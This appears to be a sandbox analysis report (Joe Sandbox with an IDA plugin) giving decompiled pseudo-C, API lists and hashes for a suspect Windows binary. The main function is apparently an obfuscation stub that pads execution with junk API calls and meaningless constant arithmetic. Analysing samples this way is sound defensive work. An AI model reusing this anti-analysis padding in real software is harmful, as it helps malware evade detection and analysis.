68 API calls 7923->7924 7925 403e06 7924->7925 7925->7922

                                                            Control-flow Graph

                                                            C-Code - Quality: 84%
                                                            			E00402ADC(void* __ebx, void* __edx, void* __ebp, void* __fp0) {
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				intOrPtr _v104;
                                                            				intOrPtr _v108;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v132;
                                                            				intOrPtr _v136;
                                                            				intOrPtr _v140;
                                                            				intOrPtr _v144;
                                                            				intOrPtr _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				intOrPtr _v160;
                                                            				intOrPtr _v164;
                                                            				intOrPtr _v168;
                                                            				intOrPtr _v172;
                                                            				intOrPtr _v176;
                                                            				intOrPtr _v180;
                                                            				intOrPtr _v184;
                                                            				intOrPtr _v188;
                                                            				intOrPtr _v192;
                                                            				intOrPtr _v196;
                                                            				intOrPtr _v200;
                                                            				intOrPtr _v204;
                                                            				intOrPtr _v208;
                                                            				intOrPtr _v212;
                                                            				intOrPtr _v216;
                                                            				intOrPtr _v220;
                                                            				intOrPtr _v224;
                                                            				intOrPtr _v228;
                                                            				intOrPtr _v232;
                                                            				intOrPtr _v236;
                                                            				intOrPtr _v240;
                                                            				intOrPtr _v244;
                                                            				intOrPtr _v248;
                                                            				intOrPtr _v252;
                                                            				intOrPtr _v256;
                                                            				intOrPtr _v260;
                                                            				intOrPtr _v264;
                                                            				intOrPtr _v268;
                                                            				intOrPtr _v272;
                                                            				intOrPtr _v276;
                                                            				intOrPtr _v280;
                                                            				intOrPtr _v284;
                                                            				intOrPtr _v288;
                                                            				intOrPtr _v292;
                                                            				intOrPtr _v296;
                                                            				intOrPtr _v300;
                                                            				intOrPtr _v304;
                                                            				intOrPtr _v308;
                                                            				intOrPtr _v312;
                                                            				intOrPtr _v316;
                                                            				intOrPtr _v320;
                                                            				intOrPtr _v324;
                                                            				intOrPtr _v328;
                                                            				intOrPtr _v332;
                                                            				intOrPtr _v336;
                                                            				intOrPtr _v340;
                                                            				intOrPtr _v344;
                                                            				intOrPtr _v348;
                                                            				long _v352;
                                                            				char _v356;
                                                            				void* _t1145;
                                                            				void* _t1148;
                                                            				void* _t1150;
                                                            				void* _t1228;
                                                            				void* _t1239;
                                                            
                                                            				_t1239 = __fp0;
                                                            				_t1150 = __edx;
                                                            				if( *0x42e384 == 0x20) {
                                                            					WindowFromDC(0);
                                                            					FreeEnvironmentStringsA(0);
                                                            					GetNumberOfConsoleMouseButtons(0);
                                                            					ResetEvent(0);
                                                            					EndUpdateResourceW(0, 0);
                                                            					GetComputerNameW(0, 0);
                                                            					E00403954(_t1148, 0, 0);
                                                            					_t1145 = E00403954(_t1148, 0, 0);
                                                            					_pop(_t1148);
                                                            					_v352 = 0;
                                                            					_v356 = 0;
                                                            					E004026A0(_t1145, __ebx, _t1148, _t1150);
                                                            					st0 = _t1239;
                                                            				}
                                                            				_t1228 = 0;
                                                            				while(1) {
                                                            					SetCommMask(0, 0); // executed
                                                            					SetLastError(0);
                                                            					__imp__GetConsoleAliasW(0, 0, 0, 0);
                                                            					if(_t1228 < 0x2481de) {
                                                            						_v20 = 0x203525ba;
                                                            						_v180 = 0x29672311;
                                                            						_v280 = 0x16c17e2f;
                                                            						_v160 = 0x4b37d46c;
                                                            						_v336 = 0x71be5419;
                                                            						_v304 = 0x2a6f2367;
                                                            						_v64 = 0x11c0adcd;
                                                            						_v152 = 0x3ddf365e;
                                                            						_v28 = 0x14911e74;
                                                            						_v308 = 0x50ce19d3;
                                                            						_v68 = 0x46f869e8;
                                                            						_v340 = 0x73e340fc;
                                                            						_v80 = 0x1359616b;
                                                            						_v76 = 0x656bf717;
                                                            						_v348 = 0x4f4a2ff8;
                                                            						_v84 = 0x8d23614;
                                                            						_v188 = 0x5ed12ef4;
                                                            						_v200 = 0x76f0e45a;
                                                            						_v140 = 0x2b9e4787;
                                                            						_v268 = 0x6871870a;
                                                            						_v240 = 0x67b6becb;
                                                            						_v48 = 0x703cc4ef;
                                                            						_v264 = 0x3a9d68c1;
                                                            						_v248 = 0x5eea6a45;
                                                            						_v36 = 0x6999b15b;
                                                            						_v44 = 0x2c309c02;
                                                            						_v276 = 0x14ac6c8f;
                                                            						_v40 = 0x7eee8d2e;
                                                            						_v144 = 0x547f0d36;
                                                            						_v112 = 0x70d291f5;
                                                            						_v356 = 0x209b567d;
                                                            						_v92 = 0x16da1455;
                                                            						_v100 = 0x1ae444cc;
                                                            						_v316 = 0x41516c8a;
                                                            						_v284 = 0x75a895a4;
                                                            						_v196 = 0x15561db7;
                                                            						_v272 = 0x3730d9c8;
                                                            						_v344 = 0x30ddf634;
                                                            						_v136 = 0x7892e542;
                                                            						_v148 = 0x5f170584;
                                                            						_v156 = 0x33c4e1ea;
                                                            						_v208 = 0x592940f0;
                                                            						_v324 = 0x25410382;
                                                            						_v292 = 0x67c87b5b;
                                                            						_v52 = 0x724cb291;
                                                            						_v108 = 0x2af6ce75;
                                                            						_v204 = 0x5346c5e;
                                                            						_v236 = 0x68a67ef7;
                                                            						_v216 = 0x7b2ef7dc;
                                                            						_v56 = 0x74b593a5;
                                                            						_v312 = 0x442ae7f3;
                                                            						_v184 = 0x18dee23d;
                                                            						_v120 = 0x4a7db4c;
                                                            						_v244 = 0x5884e700;
                                                            						_v116 = 0x7e8f4c2b;
                                                            						_v212 = 0x1027ca35;
                                                            						_v60 = 0x6f79f0f4;
                                                            						_v224 = 0x32bf6067;
                                                            						_v32 = 0x3570696a;
                                                            						_v288 = 0x15c8667f;
                                                            						_v220 = 0x8717856;
                                                            						_v124 = 0x6fcd3c9f;
                                                            						_v168 = 0x1bef4f4e;
                                                            						_v164 = 0x7e858361;
                                                            						_v300 = 0x4e1e64a2;
                                                            						_v104 = 0x35510366;
                                                            						_v320 = 0xb4a6467;
                                                            						_v72 = 0x53bb5cdd;
                                                            						_v96 = 0x57bdb0e;
                                                            						_v24 = 0x70f6f7ee;
                                                            						_v232 = 0x3fc2330c;
                                                            						_v328 = 0xc54e702;
                                                            						_v176 = 0x7f8ffaab;
                                                            						_v252 = 0x74e8996d;
                                                            						_v260 = 0x7a2361af;
                                                            						_v352 = 0x76ab72d3;
                                                            						_v172 = 0x3e506ff;
                                                            						_v88 = 0x4b61cfc9;
                                                            						_v256 = 0x34de0ea9;
                                                            						_v128 = 0x6d4d3170;
                                                            						_v228 = 0x232f9bdf;
                                                            						_v296 = 0x7089e762;
                                                            						_v332 = 0x6a3cdcab;
                                                            						_v192 = 0x524caf93;
                                                            						_v132 = 0x8c70c07;
                                                            						_v20 = _v20 + 0x4d3d3510;
                                                            						_v20 = _v20 + 0x135e1da;
                                                            						_v20 = _v20 + 0x35180cbe;
                                                            						_v20 = _v20 + 0x696d0ef2;
                                                            						_v20 = _v20 - 0x4e4a5034;
                                                            						_v20 = _v20 + 0x1b72df8b;
                                                            						_v20 = _v20 + 0x2c22951d;
                                                            						_v180 = _v180 + 0x2bd64939;
                                                            						_v64 = _v64 - 0x6da53567;
                                                            						_v304 = _v304 - 0x699b0b87;
                                                            						_v304 = _v304 + 0x20323dd;
                                                            						_v180 = _v180 - 0x16e3b0b6;
                                                            						_v336 = _v336 + 0x379dca51;
                                                            						_v280 = _v280 - 0x47b51208;
                                                            						_v76 = _v76 + 0x492b8f25;
                                                            						_v340 = _v340 - 0x69e2e061;
                                                            						_v76 = _v76 - 0x12d5d61e;
                                                            						_v80 = _v80 + 0x5e29d58;
                                                            						_v180 = _v180 + 0xa80e177;
                                                            						_v160 = _v160 - 0xf70455;
                                                            						_v336 = _v336 - 0x219e6b92;
                                                            						_v28 = _v28 - 0x20485ec4;
                                                            						_v28 = _v28 + 0x69ace6c8;
                                                            						_v308 = _v308 + 0x5a216d35;
                                                            						_v180 = _v180 + 0x3f843f47;
                                                            						_v308 = _v308 - 0x95cc609;
                                                            						_v308 = _v308 + 0x7d3a90d6;
                                                            						_v308 = _v308 - 0x73f44647;
                                                            						_v152 = _v152 + 0x6a2057fb;
                                                            						_v28 = _v28 - 0x52161216;
                                                            						_v348 = _v348 + 0x781183f9;
                                                            						_v340 = _v340 - 0x3fe7a1ba;
                                                            						_v140 = _v140 + 0x364cdd66;
                                                            						_v152 = _v152 - 0x2da2fae0;
                                                            						_v80 = _v80 - 0x3089ddf6;
                                                            						_v340 = _v340 + 0x600f4bd8;
                                                            						_v64 = _v64 + 0x6d466040;
                                                            						_v336 = _v336 - 0x6da3abc8;
                                                            						_v308 = _v308 + 0x366d9f10;
                                                            						_v48 = _v48 - 0x1ef2a420;
                                                            						_v152 = _v152 - 0x766c1a9e;
                                                            						_v28 = _v28 - 0x579729e1;
                                                            						_v140 = _v140 - 0x7eab5274;
                                                            						_v340 = _v340 + 0x1de85669;
                                                            						_v20 = _v20 - 0xbcf4e6e;
                                                            						_v308 = _v308 + 0x3d316046;
                                                            						_v264 = _v264 - 0x3f906759;
                                                            						_v80 = _v80 - 0xeb78cd9;
                                                            						_v152 = _v152 + 0x3b85cf27;
                                                            						_v268 = _v268 + 0x6693ae15;
                                                            						_v76 = _v76 + 0x5f10712f;
                                                            						_v240 = _v240 - 0x777dd0d3;
                                                            						_v268 = _v268 - 0x607f0eba;
                                                            						_v276 = _v276 - 0x65495b43;
                                                            						_v140 = _v140 - 0x10ace82b;
                                                            						_v348 = _v348 + 0x6e02360d;
                                                            						_v248 = _v248 - 0x41f3300a;
                                                            						_v44 = _v44 - 0x747dc239;
                                                            						_v276 = _v276 - 0x43b4b4c;
                                                            						_v76 = _v76 + 0x729b4def;
                                                            						_v340 = _v340 - 0xa2bdbda;
                                                            						_v340 = _v340 + 0x6f8e2f6a;
                                                            						_v336 = _v336 - 0x36e72425;
                                                            						_v308 = _v308 + 0x785a2b54;
                                                            						_v44 = _v44 - 0x26d04c95;
                                                            						_v84 = _v84 + 0x49b7c039;
                                                            						_v100 = _v100 - 0x6d199031;
                                                            						_v308 = _v308 + 0x2643aac5;
                                                            						_v40 = _v40 + 0x6b8f9482;
                                                            						_v28 = _v28 - 0x8ae8a90;
                                                            						_v160 = _v160 - 0x41898451;
                                                            						_v112 = _v112 - 0x7fe90396;
                                                            						_v112 = _v112 - 0x8093c62;
                                                            						_v144 = _v144 + 0x23975e2e;
                                                            						_v356 = _v356 + 0x1589bd55;
                                                            						_v76 = _v76 + 0x39c11ed;
                                                            						_v84 = _v84 - 0x54345c52;
                                                            						_v36 = _v36 + 0x7460d598;
                                                            						_v264 = _v264 + 0x4d3daef6;
                                                            						_v160 = _v160 - 0x4ea53d47;
                                                            						_v64 = _v64 - 0x6dd2bf73;
                                                            						_v324 = _v324 - 0x139d206e;
                                                            						_v36 = _v36 + 0x7ae2f425;
                                                            						_v336 = _v336 - 0x1862274f;
                                                            						_v264 = _v264 - 0x491e7eb3;
                                                            						_v156 = _v156 - 0x2acc84e8;
                                                            						_v36 = _v36 + 0x6122182d;
                                                            						_v340 = _v340 - 0x3deb6422;
                                                            						_v28 = _v28 + 0x60ec9f16;
                                                            						_v236 = _v236 - 0x3d84af5c;
                                                            						_v44 = _v44 - 0x1c2c5424;
                                                            						_v52 = _v52 - 0x38f9b257;
                                                            						_v204 = _v204 + 0x70e625ba;
                                                            						_v76 = _v76 + 0x4a9ab101;
                                                            						_v28 = _v28 - 0x6ca4d981;
                                                            						_v280 = _v280 + 0x7fbf517a;
                                                            						_v184 = _v184 + 0x1c88656f;
                                                            						_v36 = _v36 + 0x7d47acbf;
                                                            						_v188 = _v188 - 0x4100354b;
                                                            						_v108 = _v108 - 0x50dbfa28;
                                                            						_v304 = _v304 + 0x3f6cf8f7;
                                                            						_v76 = _v76 + 0x77e468d6;
                                                            						_v280 = _v280 + 0x45366263;
                                                            						_v36 = _v36 + 0x3e5018aa;
                                                            						_v236 = _v236 + 0x76430e4a;
                                                            						_v204 = _v204 - 0x5e97967d;
                                                            						_v344 = _v344 - 0x156ad00d;
                                                            						_v196 = _v196 + 0x50a85af0;
                                                            						_v340 = _v340 + 0x14bc8a19;
                                                            						_v244 = _v244 + 0x64a01771;
                                                            						_v40 = _v40 - 0x74023300;
                                                            						_v156 = _v156 - 0x3b643513;
                                                            						_v100 = _v100 - 0x53ffed8f;
                                                            						_v144 = _v144 - 0x2e682f84;
                                                            						_v180 = _v180 + 0x475aac54;
                                                            						_v220 = _v220 - 0x47dc6a5b;
                                                            						_v220 = _v220 - 0x1c18d963;
                                                            						_v340 = _v340 - 0x394aef10;
                                                            						_v272 = _v272 + 0x4afb8733;
                                                            						_v284 = _v284 + 0x1158e7b7;
                                                            						_v184 = _v184 + 0x2a332265;
                                                            						_v264 = _v264 + 0x1e01fc46;
                                                            						_v176 = _v176 + 0x59cb4930;
                                                            						_v320 = _v320 - 0x3746ef35;
                                                            						_v304 = _v304 - 0x33901629;
                                                            						_v148 = _v148 + 0x200960fa;
                                                            						_v268 = _v268 + 0x270d63c2;
                                                            						_v328 = _v328 - 0x538ef25c;
                                                            						_v56 = _v56 - 0x1442058;
                                                            						_v176 = _v176 + 0x202d0e4e;
                                                            						_v48 = _v48 - 0x128ada4f;
                                                            						_v72 = _v72 - 0x1bbf669e;
                                                            						_v184 = _v184 - 0x16d9feb0;
                                                            						_v152 = _v152 - 0x551d7c0;
                                                            						_v284 = _v284 + 0x7f0531ec;
                                                            						_v152 = _v152 - 0x53344960;
                                                            						_v40 = _v40 + 0x17ab5b83;
                                                            						_v40 = _v40 - 0x4cb3ea82;
                                                            					}
                                                            					if(_t1228 > 0x23f110) {
                                                            						break;
                                                            					}
                                                            					_t1228 = _t1228 + 1;
                                                            					if(_t1228 < 0x152fade0) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				 *0x42e384 =  *0x417cdc;
                                                            				 *0x42e388 =  *0x416d3c;
                                                            				E0040297F(_t1148);
                                                            				return 0;
                                                            			}





























































































                                                            0x00402adc
                                                            0x00402adc
                                                            0x00402aed
                                                            0x00402af0
                                                            0x00402af7
                                                            0x00402afe
                                                            0x00402b05
                                                            0x00402b0d
                                                            0x00402b15
                                                            0x00402b1d
                                                            0x00402b24
                                                            0x00402b2a
                                                            0x00402b2b
                                                            0x00402b2f
                                                            0x00402b32
                                                            0x00402b37
                                                            0x00402b37
                                                            0x00402b39
                                                            0x00402b3b
                                                            0x00402b3d
                                                            0x00402b44
                                                            0x00402b4e
                                                            0x00402b5a
                                                            0x00402b60
                                                            0x00402b6b
                                                            0x00402b76
                                                            0x00402b7e
                                                            0x00402b89
                                                            0x00402b91
                                                            0x00402b99
                                                            0x00402ba4
                                                            0x00402baf
                                                            0x00402bba
                                                            0x00402bc2
                                                            0x00402bcd
                                                            0x00402bd5
                                                            0x00402be0
                                                            0x00402beb
                                                            0x00402bf3
                                                            0x00402bfe
                                                            0x00402c09
                                                            0x00402c14
                                                            0x00402c1f
                                                            0x00402c27
                                                            0x00402c2f
                                                            0x00402c3a
                                                            0x00402c42
                                                            0x00402c4a
                                                            0x00402c55
                                                            0x00402c60
                                                            0x00402c68
                                                            0x00402c73
                                                            0x00402c7e
                                                            0x00402c89
                                                            0x00402c91
                                                            0x00402c9c
                                                            0x00402ca7
                                                            0x00402caf
                                                            0x00402cb7
                                                            0x00402cc2
                                                            0x00402cca
                                                            0x00402cd2
                                                            0x00402cdd
                                                            0x00402ce8
                                                            0x00402cf3
                                                            0x00402cfe
                                                            0x00402d06
                                                            0x00402d0e
                                                            0x00402d19
                                                            0x00402d24
                                                            0x00402d2f
                                                            0x00402d3a
                                                            0x00402d45
                                                            0x00402d50
                                                            0x00402d58
                                                            0x00402d63
                                                            0x00402d6e
                                                            0x00402d76
                                                            0x00402d81
                                                            0x00402d8c
                                                            0x00402d97
                                                            0x00402da2
                                                            0x00402dad
                                                            0x00402db5
                                                            0x00402dc0
                                                            0x00402dcb
                                                            0x00402dd6
                                                            0x00402de1
                                                            0x00402de9
                                                            0x00402df4
                                                            0x00402dfc
                                                            0x00402e07
                                                            0x00402e12
                                                            0x00402e1d
                                                            0x00402e28
                                                            0x00402e30
                                                            0x00402e3b
                                                            0x00402e43
                                                            0x00402e4b
                                                            0x00402e53
                                                            0x00402e5e
                                                            0x00402e69
                                                            0x00402e71
                                                            0x00402e7c
                                                            0x00402e87
                                                            0x00402e8f
                                                            0x00402e97
                                                            0x00402ea2
                                                            0x00402ead
                                                            0x00402ecb
                                                            0x00402ed6
                                                            0x00402ee1
                                                            0x00402eec
                                                            0x00402ef7
                                                            0x00402f02
                                                            0x00402f0d
                                                            0x00402f45
                                                            0x00402f50
                                                            0x00402f85
                                                            0x00402fa0
                                                            0x00402fd1
                                                            0x00402fd9
                                                            0x00402ff4
                                                            0x00402fff
                                                            0x00403014
                                                            0x0040301f
                                                            0x0040302a
                                                            0x00403035
                                                            0x00403040
                                                            0x00403048
                                                            0x00403053
                                                            0x0040306b
                                                            0x00403073
                                                            0x0040307e
                                                            0x00403086
                                                            0x0040309b
                                                            0x004030a3
                                                            0x004030ae
                                                            0x004030b9
                                                            0x004030c1
                                                            0x004030c9
                                                            0x004030d4
                                                            0x004030f2
                                                            0x004030fd
                                                            0x00403118
                                                            0x00403123
                                                            0x00403138
                                                            0x00403160
                                                            0x0040316b
                                                            0x00403176
                                                            0x0040319b
                                                            0x004031a6
                                                            0x004031ae
                                                            0x004031b9
                                                            0x004031db
                                                            0x004031e3
                                                            0x004031ee
                                                            0x004031f9
                                                            0x00403201
                                                            0x00403219
                                                            0x00403221
                                                            0x00403229
                                                            0x0040323e
                                                            0x00403282
                                                            0x0040329d
                                                            0x004032b8
                                                            0x004032c3
                                                            0x004032cb
                                                            0x004032d6
                                                            0x004032de
                                                            0x00403306
                                                            0x0040330e
                                                            0x00403316
                                                            0x00403321
                                                            0x0040332c
                                                            0x00403337
                                                            0x00403372
                                                            0x00403390
                                                            0x0040339b
                                                            0x004033a6
                                                            0x004033c4
                                                            0x004033cf
                                                            0x004033da
                                                            0x004033e2
                                                            0x00403400
                                                            0x0040340b
                                                            0x00403416
                                                            0x0040341e
                                                            0x00403429
                                                            0x00403434
                                                            0x0040344f
                                                            0x00403467
                                                            0x0040346f
                                                            0x0040348a
                                                            0x00403495
                                                            0x004034a0
                                                            0x004034a8
                                                            0x004034c0
                                                            0x00403511
                                                            0x0040354f
                                                            0x0040357a
                                                            0x004035a5
                                                            0x004035b0
                                                            0x004035bb
                                                            0x004035c3
                                                            0x004035ce
                                                            0x004035d9
                                                            0x004035e4
                                                            0x00403615
                                                            0x0040361d
                                                            0x00403628
                                                            0x00403630
                                                            0x0040363b
                                                            0x0040366d
                                                            0x00403678
                                                            0x00403680
                                                            0x0040368b
                                                            0x00403693
                                                            0x0040369b
                                                            0x004036b9
                                                            0x004036c4
                                                            0x004036cf
                                                            0x004036ed
                                                            0x004036f8
                                                            0x00403716
                                                            0x00403721
                                                            0x00403729
                                                            0x00403744
                                                            0x0040374c
                                                            0x0040376a
                                                            0x0040377f
                                                            0x0040378a
                                                            0x00403792
                                                            0x0040379a
                                                            0x004037a5
                                                            0x004037ad
                                                            0x004037d5
                                                            0x0040380d
                                                            0x00403818
                                                            0x00403823
                                                            0x0040382e
                                                            0x00403839
                                                            0x00403877
                                                            0x004038c5
                                                            0x004038dd
                                                            0x004038e8
                                                            0x004038e8
                                                            0x004038f9
                                                            0x00000000
                                                            0x00000000
                                                            0x004038fb
                                                            0x00403902
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403902
                                                            0x0040390d
                                                            0x00403917
                                                            0x0040391c
                                                            0x0040392b

                                                            APIs
                                                            • WindowFromDC.USER32(00000000), ref: 00402AF0
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00402AF7
                                                            • GetNumberOfConsoleMouseButtons.KERNEL32(00000000), ref: 00402AFE
                                                            • ResetEvent.KERNEL32(00000000), ref: 00402B05
                                                            • EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 00402B0D
                                                            • GetComputerNameW.KERNEL32 ref: 00402B15
                                                            • _calloc.LIBCMT ref: 00402B1D
                                                              • Part of subcall function 00403954: __calloc_impl.LIBCMT ref: 00403969
                                                            • _calloc.LIBCMT ref: 00402B24
                                                            • SetCommMask.KERNELBASE(00000000,00000000), ref: 00402B3D
                                                            • SetLastError.KERNEL32(00000000), ref: 00402B44
                                                            • GetConsoleAliasW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402B4E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: Console_calloc$AliasButtonsCommComputerEnvironmentErrorEventFreeFromLastMaskMouseNameNumberResetResourceStringsUpdateWindow__calloc_impl
                                                            • String ID: "d=$#h-$%$6$4PJN$5F7$<=Tl$<4X$@`Fm$B;$C[Ie$Ej^$IBu7$K5$R\4T$T+Zx$`I4S$`Y7@$cb6E$ciH$e"3*$eW9$$eXYh$g#o*$jip5$p1Mm$ua%
                                                            • API String ID: 3970707773-1174297621
                                                            • Opcode ID: 89226f564d5f7ef76224a0bb22336775805795087b84c8bbd26aea03c150fafb
                                                            • Instruction ID: 7d6024ee7fd9ec234fd95a22c0028d596abd6143ad8083b8d8f630a2275a3152
                                                            • Opcode Fuzzy Hash: 89226f564d5f7ef76224a0bb22336775805795087b84c8bbd26aea03c150fafb
                                                            • Instruction Fuzzy Hash: 1462EAB9609380CBC2B48F6AC58968EF7E4BF99354F508D0CE5CA9A620C7709985CF57
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 16 40714f-40715e GetEnvironmentStringsW 17 407160-407163 16->17 18 407164-407167 16->18 19 407177-407180 call 4080c9 18->19 20 407169-40716e 18->20 23 407185-40718a 19->23 20->20 21 407170-407175 20->21 21->19 21->20 24 407199-4071a4 call 40a030 23->24 25 40718c-407198 FreeEnvironmentStringsW 23->25 24->25
                                                            C-Code - Quality: 100%
                                                            			E0040714F() {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				WCHAR* _t1;
                                                            				void* _t5;
                                                            				void* _t18;
                                                            				WCHAR* _t20;
                                                            
                                                            				_t1 = GetEnvironmentStringsW();
                                                            				_t20 = _t1;
                                                            				if(_t20 != 0) {
                                                            					if( *_t20 != 0) {
                                                            						goto L3;
                                                            						do {
                                                            							do {
                                                            								L3:
                                                            								_t1 =  &(_t1[1]);
                                                            							} while ( *_t1 != 0);
                                                            							_t1 =  &(_t1[1]);
                                                            						} while ( *_t1 != 0);
                                                            					}
                                                            					_t13 = _t1 - _t20 + 2;
                                                            					_t5 = E004080C9(_t1 - _t20 + 2); // executed
                                                            					_t18 = _t5;
                                                            					if(_t18 != 0) {
                                                            						E0040A030(_t13, _t18, _t20, _t18, _t20, _t13);
                                                            					}
                                                            					FreeEnvironmentStringsW(_t20);
                                                            					return _t18;
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}










                                                            0x00407152
                                                            0x00407158
                                                            0x0040715e
                                                            0x00407167
                                                            0x00000000
                                                            0x00407169
                                                            0x00407169
                                                            0x00407169
                                                            0x0040716a
                                                            0x0040716b
                                                            0x00407171
                                                            0x00407172
                                                            0x00407169
                                                            0x0040717c
                                                            0x00407180
                                                            0x00407185
                                                            0x0040718a
                                                            0x0040719c
                                                            0x004071a1
                                                            0x0040718d
                                                            0x00407198
                                                            0x00407160
                                                            0x00407163
                                                            0x00407163

                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00403F3A), ref: 00407152
                                                            • __malloc_crt.LIBCMT ref: 00407180
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040718D
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                            • String ID:
                                                            • API String ID: 237123855-0
                                                            • Opcode ID: 8fabccca1e6171ddc240eda1d034c06755ba580f82cf259f9fe05248f73ea12e
                                                            • Instruction ID: 3864f1fbe5c903a96f437bc9bd3a71b249565b48777c964063066275c13dfad6
                                                            • Opcode Fuzzy Hash: 8fabccca1e6171ddc240eda1d034c06755ba580f82cf259f9fe05248f73ea12e
                                                            • Instruction Fuzzy Hash: 97F0E23B9191616ADA203B357C488771668DAC6329312443BF896E73C0F9385D8382AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 28 407400-407422 HeapCreate 29 407424-407425 28->29 30 407426-40742f 28->30
                                                            C-Code - Quality: 100%
                                                            			E00407400(intOrPtr _a4) {
                                                            				void* _t6;
                                                            
                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                            				 *0x42cc54 = _t6;
                                                            				if(_t6 != 0) {
                                                            					 *0x42e3b0 = 1;
                                                            					return 1;
                                                            				} else {
                                                            					return _t6;
                                                            				}
                                                            			}




                                                            0x00407415
                                                            0x0040741b
                                                            0x00407422
                                                            0x00407429
                                                            0x0040742f
                                                            0x00407425
                                                            0x00407425
                                                            0x00407425

                                                            APIs
                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00407415
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: CreateHeap
                                                            • String ID:
                                                            • API String ID: 10892065-0
                                                            • Opcode ID: a8e052f728ec12cc3e5f5d60750cda5194ed186666e8db9e306b9fa3345bd77c
                                                            • Instruction ID: a3bc6628b949999fdfff56c04f18f5397488db4a514c08553ac6af2647db9f8c
                                                            • Opcode Fuzzy Hash: a8e052f728ec12cc3e5f5d60750cda5194ed186666e8db9e306b9fa3345bd77c
                                                            • Instruction Fuzzy Hash: 64D0A732A543849EDB209FB2BD08B663BDCE3843D5F408437FA0DD6690F674D951C548
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 31 40619b-40619d call 406129 33 4061a2-4061a3 31->33
                                                            C-Code - Quality: 100%
                                                            			E0040619B() {
                                                            				void* _t1;
                                                            
                                                            				_t1 = E00406129(0); // executed
                                                            				return _t1;
                                                            			}




                                                            0x0040619d
                                                            0x004061a3

                                                            APIs
                                                            • __encode_pointer.LIBCMT ref: 0040619D
                                                              • Part of subcall function 00406129: TlsGetValue.KERNEL32(00000000,?,004061A2,00000000,0040A3A5,0042C5B0,00000000,00000314), ref: 0040613B
                                                              • Part of subcall function 00406129: TlsGetValue.KERNEL32(00000004,?,004061A2,00000000,0040A3A5,0042C5B0,00000000,00000314), ref: 00406152
